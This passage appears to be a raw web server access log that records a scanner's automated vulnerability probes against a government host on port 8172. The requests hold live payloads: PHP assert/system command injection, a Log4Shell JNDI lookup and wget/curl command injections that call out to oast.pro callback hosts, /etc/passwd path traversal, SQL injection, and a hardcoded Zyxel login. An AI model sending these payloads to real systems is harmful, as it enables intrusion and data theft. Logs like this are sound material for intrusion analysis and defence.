s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 61 2023-08-02 10:29:30 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 69 2023-08-02 10:34:36 103.153.214.94 GET / search==%00{.cookie|OHGt8N|value%3dCVE-2014-6287.} 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 72 2023-08-02 10:36:59 103.153.214.94 POST /j_security_check - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login 404 7 0 76 2023-08-02 10:39:18 103.153.214.94 GET /oam/server/opensso/sessionservice - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 87 2023-08-02 10:40:06 103.153.214.94 GET / author=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 76 2023-08-02 10:40:13 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 80 2023-08-02 10:48:43 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 85 2023-08-02 10:49:45 103.153.214.94 GET /admin/install.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 83 2023-08-02 10:50:01 103.153.214.94 POST /user/register element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 bcvt.kontum.gov.vn:8172/user/register 404 7 0 82 2023-08-02 10:51:15 103.153.214.94 POST /php/ping.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 58 2023-08-02 11:00:45 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 384 2023-08-02 11:01:24 103.153.214.94 POST /user.action - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 80 2023-08-02 11:02:38 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 94 2023-08-02 11:02:43 103.153.214.94 GET /ext-js/index.html - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 83 2023-08-02 11:03:55 103.153.214.94 GET /dr/authentication/oauth2/oauth2login error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-249%7D$%7B%3A-420%7D.$%7BhostName%7D.uri.cj4i6mq47492iin2kjb0jpxee7ek4ompi.oast.pro%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 83 2023-08-02 11:11:24 103.153.214.94 GET /wan.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 58 2023-08-02 11:11:27 103.153.214.94 GET /api/console/api_server sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 80 2023-08-02 11:14:11 103.153.214.94 GET /plus/ajax_street.php act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 86 2023-08-02 11:22:22 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 8172 - 111.90.143.37 asusrouter-- https://bcvt.kontum.gov.vn:8172 404 7 0 66 2023-08-02 11:22:32 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 67 2023-08-02 11:24:17 103.153.214.94 GET /cgi-bin/touchlist_sync.cgi IP=;wget+http://cj4i6mq47492iin2kjb0rf4uwtwrgwck7.oast.pro; 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 85 2023-08-02 11:24:29 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 81 2023-08-02 11:24:39 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 97 2023-08-02 11:29:09 103.153.214.94 GET /geoserver/ows service=WFS&version=1.0.0&request=GetCapabilities 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 61 2023-08-02 11:36:15 103.153.214.94 POST /goform/setSysAdm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.shtml 404 7 0 76